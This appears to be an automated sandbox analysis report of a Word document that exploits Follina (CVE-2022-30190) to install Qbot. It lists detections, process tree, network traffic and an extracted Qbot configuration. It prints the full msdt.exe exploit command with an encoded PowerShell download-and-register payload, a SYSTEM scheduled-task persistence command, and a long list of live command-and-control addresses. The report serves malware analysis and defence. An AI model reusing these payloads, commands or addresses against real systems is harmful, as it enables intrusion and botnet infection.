Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
doc782.docx

Overview

General Information

Sample Name:doc782.docx
Analysis ID:640940
MD5:e7015438268464cedad98b1544d643ad
SHA1:03ef0e06d678a07f0413d95f0deb8968190e4f6b
SHA256:d20120cc046cef3c3f0292c6cbc406fcf2a714aa8e048c9188f1184e4bb16c93
Infos:

Detection

CryptOne, Follina CVE-2022-30190, Qbot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected Qbot
Multi AV Scanner detection for submitted file
Yara detected CryptOne packer
Sigma detected: Schedule system process
Yara detected Microsoft Office Exploit Follina CVE-2022-30190
Snort IDS alert for network traffic
Maps a DLL or memory area into another process
Overwrites code with unconditional jumps - possibly settings hooks in foreign process
Writes to foreign memory regions
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory in foreign processes
Injects code into the Windows Explorer (explorer.exe)
Contains an external reference to another file
Document exploit detected (process start blacklist hit)
Uses schtasks.exe or at.exe to add and modify task schedules
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Downloads executable code via HTTP
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Potential document exploit detected (unknown TCP traffic)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Drops PE files to the windows directory (C:\Windows)
Found evasive API chain checking for process token information
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Potential document exploit detected (performs HTTP gets)
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • WINWORD.EXE (PID: 7032 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding MD5: 0B9AB9B9C4DE429473D6450D4297A123)
    • MSOSYNC.EXE (PID: 5960 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • MSOSYNC.EXE (PID: 5160 cmdline: C:\Program Files (x86)\Microsoft Office\Office16\MsoSync.exe MD5: EA19F4A0D18162BE3A0C8DAD249ADE8C)
    • msdt.exe (PID: 2984 cmdline: C:\Windows\system32\msdt.exe" ms-msdt:/id PCWDiagnostic /skip force /param "IT_RebrowseForFile=? IT_LaunchMethod=ContextMenu IT_BrowseForFile=$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'Unicode.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JABwACAAPQAgACQARQBuAHYAOgB0AGUAbQBwADsAaQB3AHIAIABoAHQAdABwADoALwAvADEAMAA0AC4AMwA2AC4AMgAyADkALgAxADMAOQAvACQAKAByAGEAbgBkAG8AbQApAC4AZABhAHQAIAAtAE8AdQB0AEYAaQBsAGUAIAAkAHAAXAB0AC4AQQA7AGkAdwByACAAaAB0AHQAcAA6AC8ALwA4ADUALgAyADMAOQAuADUANQAuADIAMgA4AC8AJAAoAHIAYQBuAGQAbwBtACkALgBkAGEAdAAgAC0ATwB1AHQARgBpAGwAZQAgACQAcABcAHQAMQAuAEEAOwBpAHcAcgAgAGgAdAB0AHAAOgAvAC8AMQA4ADUALgAyADMANAAuADIANAA3AC4AMQAxADkALwAkACgAcgBhAG4AZABvAG0AKQAuAGQAYQB0ACAALQBPAHUAdABGAGkAbABlACAAJABwAFwAdAAyAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQALgBBADsAcgBlAGcAcwB2AHIAMwAyACAAJABwAFwAdAAxAC4AQQA7AHIAZQBnAHMAdgByADMAMgAgACQAcABcAHQAMgAuAEEA'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe MD5: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4)
  • csc.exe (PID: 4480 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\asaommz3\asaommz3.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 1124 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES2969.tmp" "c:\Users\user\AppData\Local\Temp\asaommz3\CSCAF22E0F83F3247E8BD8B234DB9985444.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • csc.exe (PID: 4384 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\i3ghm531\i3ghm531.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 4536 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4732.tmp" "c:\Users\user\AppData\Local\Temp\i3ghm531\CSCC6D89D5E8D544281B069B8814BE4D14E.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 1320 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 4384 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • regsvr32.exe (PID: 5688 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t1.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 2256 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
      • schtasks.exe (PID: 4456 cmdline: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06 MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 1548 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • regsvr32.exe (PID: 4768 cmdline: "C:\Windows\system32\regsvr32.exe" C:\Users\user\AppData\Local\Temp\t2.A MD5: 426E7499F6A7346F0410DEAD0805586B)
    • explorer.exe (PID: 5492 cmdline: C:\Windows\SysWOW64\explorer.exe MD5: 166AB1B9462E5C1D6D18EC5EC0B6A5F7)
  • csc.exe (PID: 5404 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\01rkp2ka\01rkp2ka.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
    • cvtres.exe (PID: 4496 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES1B1C.tmp" "c:\Users\user\AppData\Local\Temp\01rkp2ka\CSC332C869B68444DFCA3A2C61AAABD180.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • regsvr32.exe (PID: 6036 cmdline: regsvr32.exe -s "C:\Users\user\AppData\Local\Temp\t1.A" MD5: D78B75FC68247E8A63ACBA846182740E)
    • regsvr32.exe (PID: 3976 cmdline: -s "C:\Users\user\AppData\Local\Temp\t1.A" MD5: 426E7499F6A7346F0410DEAD0805586B)
  • cleanup

Malware Configuration

Threatname: Qbot

{"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", "40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222", "42.228.224.249:2222", "172.114.160.81:995", "94.26.122.9:995", "75.99.168.194:443", "189.253.206.105:443", "81.215.196.174:443", "46.107.48.202:443"]}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
    • 0x1447:$re1: location.href = "ms-msdt:
    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htmJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RESMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
      • 0x1447:$re1: location.href = "ms-msdt:
      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RESJoeSecurity_FollinaYara detected Microsoft Office Exploit Follina / CVE-2022-30190Joe Security
        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htmMAL_Msdt_MSProtocolURI_May22Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190Tobias Michalski, Christian Burkard
        • 0x1447:$re1: location.href = "ms-msdt:
        Click to see the 1 entries

        Memory Dumps

        SourceRuleDescriptionAuthorStrings
        0000001B.00000002.672940732.00000000043F0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
          00000021.00000002.710753771.0000000002E60000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
            00000020.00000000.671132506.0000000002F80000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
              00000021.00000000.671727955.0000000002E60000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
                0000001C.00000002.673063332.00000000042A0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_Qbot_1Yara detected QbotJoe Security
                  Click to see the 18 entries

                  Unpacked PEs

                  SourceRuleDescriptionAuthorStrings
                  27.2.regsvr32.exe.4990000.3.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                    27.2.regsvr32.exe.43f0000.1.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                      29.2.regsvr32.exe.4ad0000.2.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                        27.2.regsvr32.exe.43c0184.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                          28.2.regsvr32.exe.810184.0.unpackJoeSecurity_Qbot_1Yara detected QbotJoe Security
                            Click to see the 25 entries

                            Sigma Signatures

                            Persistence and Installation Behavior

                            barindex
                            Sigma detected: Schedule system process
                            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, CommandLine: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Windows\SysWOW64\explorer.exe, ParentImage: C:\Windows\SysWOW64\explorer.exe, ParentProcessId: 2256, ParentProcessName: explorer.exe, ProcessCommandLine: "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn swyghewz /tr "regsvr32.exe -s \"C:\Users\user\AppData\Local\Temp\t1.A\"" /SC ONCE /Z /ST 19:54 /ET 20:06, ProcessId: 4456, ProcessName: schtasks.exe

                            Snort Signatures

                            Timestamp:185.234.247.119192.168.2.2280491712036726 06/07/22-19:44:37.058628
                            SID:2036726
                            Source Port:80
                            Destination Port:49171
                            Protocol:TCP
                            Classtype:Attempted User Privilege Gain

                            Joe Sandbox Signatures

                            Click to jump to signature section

                            Show All Signature Results

                            AV Detection

                            barindex
                            Multi AV Scanner detection for submitted file
                            Source: doc782.docxVirustotal: Detection: 28%Perma Link
                            Source: doc782.docxReversingLabs: Detection: 17%
                            Source: 32.2.explorer.exe.2f80000.0.unpackMalware Configuration Extractor: Qbot {"Bot id": "obama186", "Campaign": "1654596660", "Version": "403.694", "C2 list": ["67.165.206.193:993", "63.143.92.99:995", "74.14.5.179:2222", "182.191.92.203:995", "197.89.8.51:443", "89.101.97.139:443", "86.97.9.190:443", "124.40.244.115:2222", "80.11.74.81:2222", "41.215.153.104:995", "179.100.20.32:32101", "31.35.28.29:443", "202.134.152.2:2222", "109.12.111.14:443", "93.48.80.198:995", "120.150.218.241:995", "41.38.167.179:995", "177.94.57.126:32101", "173.174.216.62:443", "1.161.101.20:443", "88.224.254.172:443", "82.41.63.217:443", "67.209.195.198:443", "70.46.220.114:443", "24.178.196.158:2222", "39.44.213.68:995", "84.241.8.23:32103", "210.246.4.69:995", "92.132.172.197:2222", "91.177.173.10:995", "217.128.122.65:2222", "149.28.238.199:995", "45.76.167.26:995", "45.63.1.12:443", "144.202.2.175:443", "45.63.1.12:995", "144.202.3.39:995", "144.202.2.175:995", "45.76.167.26:443", "149.28.238.199:443", "144.202.3.39:443", "140.82.63.183:995", "140.82.63.183:443", "175.145.235.37:443", "85.246.82.244:443", "47.23.89.60:993", "187.207.131.50:61202", "176.67.56.94:443", "148.64.96.100:443", "140.82.49.12:443", "76.70.9.169:2222", "217.164.121.161:2222", "72.27.33.160:443", "108.60.213.141:443", "104.34.212.7:32103", "39.44.158.215:995", "31.48.174.63:2078", "75.99.168.194:61201", "117.248.109.38:21", "83.110.218.147:993", "82.152.39.39:443", "180.129.108.214:995", "5.32.41.45:443", "83.110.92.106:443", "197.164.182.46:993", "196.203.37.215:80", "186.90.153.162:2222", "37.186.54.254:995", "89.211.179.247:2222", "24.139.72.117:443", "201.142.177.168:443", "37.34.253.233:443", "69.14.172.24:443", "125.24.187.183:443", "208.107.221.224:443", "174.69.215.101:443", "76.25.142.196:443", "96.37.113.36:993", "173.21.10.71:2222", "73.151.236.31:443", "45.46.53.140:2222", "189.146.90.232:443", "70.51.135.90:2222", "190.252.242.69:443", "201.145.165.25:443", "47.157.227.70:443", "72.252.157.93:993", "177.205.155.85:443", "72.252.157.93:995", "187.251.132.144:22", "40.134.246.185:995", "24.55.67.176:443", "79.80.80.29:2222", "179.158.105.44:443", "72.252.157.93:990", "89.86.33.217:443", "201.172.23.68:2222", "102.182.232.3:995", "177.156.191.231:443", "39.49.96.122:995", "94.36.193.176:2222", "120.61.1.114:443", "217.164.121.161:1194", "39.41.29.200:995", "86.195.158.178:2222", "86.98.149.168:2222", "1.161.101.20:995", "124.109.35.32:995", "172.115.177.204:2222", "105.27.172.6:443", "32.221.224.140:995", "208.101.82.0:443", "71.24.118.253:443", "143.0.219.6:995", "217.165.176.49:2222", "90.120.65.153:2078", "5.203.199.157:995", "39.52.41.80:995", "148.0.56.63:443", "191.112.25.187:443", "121.7.223.45:2222", "47.156.131.10:443", "177.209.202.242:2222", "41.86.42.158:995", "106.51.48.170:50001", "41.84.229.240:443", "94.71.169.212:995", "111.125.245.116:995", "78.101.193.241:6883", "201.242.175.29:2222", "38.70.253.226:2222", "187.149.236.5:443", "217.165.79.88:443", "85.255.232.18:443", "103.246.242.202:443", "41.230.62.211:995", "67.69.166.79:2222",

                            Exploits

                            barindex
                            Yara detected Microsoft Office Exploit Follina CVE-2022-30190
                            Source: Yara matchFile source: dump.pcap, type: PCAP
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\89DF4BAA.htm, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\123[1].RES, type: DROPPED
                            Source: Yara matchFile source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\16E37148.htm, type: DROPPED
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dllJump to behavior
                            Source: Binary string: amstream.pdb source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
                            Source: Binary string: amstream.pdbGCTL source: explorer.exe, 00000020.00000003.675706177.0000000005221000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000021.00000003.674870677.0000000004DAB000.00000004.00000800.00020000.00000000.sdmp, explorer.exe, 00000022.00000003.678475892.0000000004D51000.00000004.00000800.00020000.00000000.sdmp
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 27_2_0499BCFC FindFirstFileW,FindNextFileW,27_2_0499BCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 28_2_042ABCFC FindFirstFileW,FindNextFileW,28_2_042ABCFC
                            Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 29_2_04AFBCFC FindFirstFileW,FindNextFileW,29_2_04AFBCFC
                            Source: C:\Windows\SysWOW64\explorer.exeCode function: 32_2_02F8BCFC FindFirstFileW,FindNextFileW,32_2_02F8BCFC

                            Software Vulnerabilities

                            barindex
                            Document exploit detected (process start blacklist hit)
                            Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess created: C:\Windows\SysWOW64\msdt.exe
                            Source: global trafficTCP traffic: 192.168.2.5:49744 -> 185.234.247.119:80
                            Source: global trafficTCP traffic: 192.168.2.5:49763 -> 185.234.247.119:80

                            Networking

                            barindex
                            Snort IDS alert for network traffic
                            Source: TrafficSnort IDS: 2036726 ET EXPLOIT Possible Microsoft Support Diagnostic Tool Exploitation Inbound (CVE-2022-30190) 185.234.247.119:80 -> 192.168.2.22:49171
                            Source: Joe Sandbox ViewASN Name: INTERKONEKT-ASPL INTERKONEKT-ASPL
                            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 07 Jun 2022 17:51:26 GMTContent-Type: application/octet-streamContent-Length: 1437696Connection: keep-aliveAccept-Ranges: bytesExpires: 0Cache-Control: no-cache, no-store, must-revalidateContent-Disposition: attachment;Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e a1 0b 01 02 19 00 02 11 00 00 ea 04 00 00 00 00 00 90 0d 11 00 00 10 00 00 00 20 11 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 50 16 00 00 04 00 00 00 00 00 00 02 00 01 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 11 00 ba 25 00 00 00 00 13 00 00 48 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 6c 53 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 43 4f 44 45 00 00 00 00 f4 01 11 00 00 10 00 00 00 02 11 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 44 41 54 41 00 00 00 00 f8 27 00 00 00 20 11 00 00 28 00 00 00 06 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 42 53 53 00 00 00 00 00 71 10 00 00 00 50 11 00 00 00 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 ba 25 00 00 00 70 11 00 00 26 00 00 00 2e 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 6c 53 01 00 00 a0 11 00 00 54 01 00 00 54 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 2e 72 73 72 63 00 00 00 00 48 03 00 00 00 13 00 00 48 03 00 00 a8 12 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 50 16 00 00 00 00 00 00 f0 15 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                            Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /123.RES HTTP/1.1Accept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; ms-office; MSOffice 16)Accept-Encoding: gzip, deflateHost: 185.234.247.119If-Modified-Since: Fri, 03 Jun 2022 10:07:25 GMTIf-None-Match: "6299dd5d-1861"Connection: Keep-Alive
                            Source: global trafficHTTP traffic detected: GET /972639944.dat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: 185.234.247.119Connection: Keep-Alive
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
                            Source: unknownTCP traffic detected without corresponding DNS query: 185.234.247.119
